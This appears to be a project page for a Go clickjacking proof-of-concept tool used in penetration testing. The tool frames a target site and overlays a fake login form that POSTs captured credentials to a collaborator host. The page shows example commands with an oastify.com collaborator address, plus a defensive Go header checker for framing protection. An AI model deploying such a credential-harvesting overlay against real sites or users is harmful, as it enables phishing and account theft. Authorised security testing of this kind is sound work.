go · clickjacking · red team

ClickJacker

ClickJacker is a clickjacking proof-of-concept tool written in Go. It loads a target URL in an iframe and overlays a fake login form on top, with submitted credentials POSTed to a collaborator address you supply. Providing the target URL as a positional argument is enough to get it running, and from there you can take a client-ready screenshot in a matter of seconds.

Live demo: really frames the target via frame-src https:. Captured credentials stay in your browser. The collaborator log is simulated.

What it does

Clickjacking works by exploiting a site that can be framed, and ClickJacker handles the setup. It frames the target to give the overlay some context, then drops a fake login form over the top. Credentials submitted through the overlay are POSTed to a collaborator address you supply, so you can demonstrate to a client exactly what an attacker would capture. Whether a target is actually vulnerable still requires some judgement on your part. Framebusting JavaScript and response headers can defeat framing in ways that are difficult to check automatically, so the tool gets the PoC in front of you and leaves the assessment to you.
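The header half of that judgement can be automated even if the JavaScript half cannot. The following is an added example in Go and not part of ClickJacker: it classifies a response's X-Frame-Options and Content-Security-Policy frame-ancestors headers using the precedence browsers apply (frame-ancestors overrides X-Frame-Options; the obsolete ALLOW-FROM value counts for nothing) and runs over constructed sample headers. The function name AllowsAnyFraming and the sample values are assumptions; frame-busting JavaScript is deliberately out of scope.

```go
package main

import (
	"fmt"
	"net/http"
	"strings"
)

// AllowsAnyFraming reports whether response headers leave a page frameable by an arbitrary
// origin, and which header decided it. Browsers ignore X-Frame-Options once an enforced
// CSP frame-ancestors directive is present, so CSP is evaluated first.
func AllowsAnyFraming(h http.Header) (bool, string) {
	var cspSeen, open bool
	for _, csp := range h.Values("Content-Security-Policy") {
		for _, d := range strings.Split(csp, ";") { // each directive: name followed by sources
			f := strings.Fields(d)
			if len(f) == 0 || !strings.EqualFold(f[0], "frame-ancestors") {
				continue
			}
			cspSeen, open = true, false
			for _, s := range f[1:] { // "*" or a bare scheme such as https: admits any origin
				open = open || s == "*" || strings.HasSuffix(s, ":")
			}
			if !open { // 'none', 'self' or an explicit host list: third parties cannot frame it
				return false, "Content-Security-Policy: frame-ancestors " + strings.Join(f[1:], " ")
			}
		}
	}
	if cspSeen {
		return true, "frame-ancestors admits any origin (X-Frame-Options is ignored alongside it)"
	}
	for _, v := range h.Values("X-Frame-Options") { // obsolete ALLOW-FROM is ignored, as browsers do
		if t := strings.ToLower(strings.TrimSpace(v)); t == "deny" || t == "sameorigin" {
			return false, "X-Frame-Options: " + t
		}
	}
	return true, "no frame-ancestors directive and no X-Frame-Options DENY/SAMEORIGIN"
}

func main() {
	samples := map[string]http.Header{ // constructed responses, not captured from any real host
		"bare":    {},
		"xfo":     {"X-Frame-Options": {"SAMEORIGIN"}},
		"csp-any": {"Content-Security-Policy": {"frame-ancestors https:"}, "X-Frame-Options": {"DENY"}},
	}
	for name, h := range samples {
		open, why := AllowsAnyFraming(h)
		fmt.Printf("%-8s frameable=%v (%s)\n", name, open, why)
	}
}
```

A "frameable" verdict here only means the headers do not stop it; the page still has to be loaded in a real browser to rule out frame-busting scripts and per-route differences.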

A word on the name. Classic clickjacking tricks a user into clicking a real UI element through an invisible overlay, the kind of technique you would find in a PortSwigger lab. ClickJacker takes a different approach, framing the target for credibility and dropping a fake login form over the top instead, which tends to land as the higher-impact finding in most real engagements. The label is a slight stretch, but ClickJacker read better than go_frameable.

Written in Go, zero dependencies

The whole tool is the Go standard library, no third-party packages in go.mod. A few design decisions worth noting over the old static HTML approach:

  • Single static binary. The HTML template, CSS and fonts are baked in with //go:embed, so the build is one self-contained executable you can scp onto a jump box with nothing to install.
  • stdlib web server. A plain net/http server on :9999 renders an html/template seeded with the target and collaborator values.
  • Immediate CLI targeting. Positional arguments set the target URL and the collaborator address. No config files, no menus.
  • Optional logo. An --logo flag accepts a URL or local file path, or a logo file dropped next to the binary, and adds an image to the nav bar if you want to dress the page up for a specific engagement.
  • Opens the browser automatically. On launch it waits for the server to come up, then calls out to xdg-open, open, or rundll32 depending on the OS, so the PoC is on screen as soon as the binary runs.
  • Container-aware. Setting CONTAINER=TRUE skips the browser auto-open so it runs cleanly in Docker, and it stamps X-Frame-Options: Deny on its own responses so the tool itself cannot be framed.

# point it at a target, capture to your collaborator
clickjack https://app.acme.example https://x9k2.oastify.com

# optional: swap the nav-bar logo (URL or local file)
clickjack --logo ./logo.svg https://app.acme.example https://x9k2.oastify.com

# headless in Docker — CONTAINER=TRUE suppresses the browser auto-open
docker run -p 9999:9999 clickjacker https://app.acme.example

Why it saves time on multi-app engagements

Clickjacking is a relatively simple finding, but on an engagement with a large number of in-scope applications the manual process adds up. Building a framing PoC for each host means writing the HTML, hosting it, and taking a screenshot, and that repeats across each application and each authenticated route you want to evidence. ClickJacker reduces that to a single command per host, and from there it is a case of swapping the target argument and taking the next screenshot.

Authorised testing only. Use against systems you have explicit permission to assess.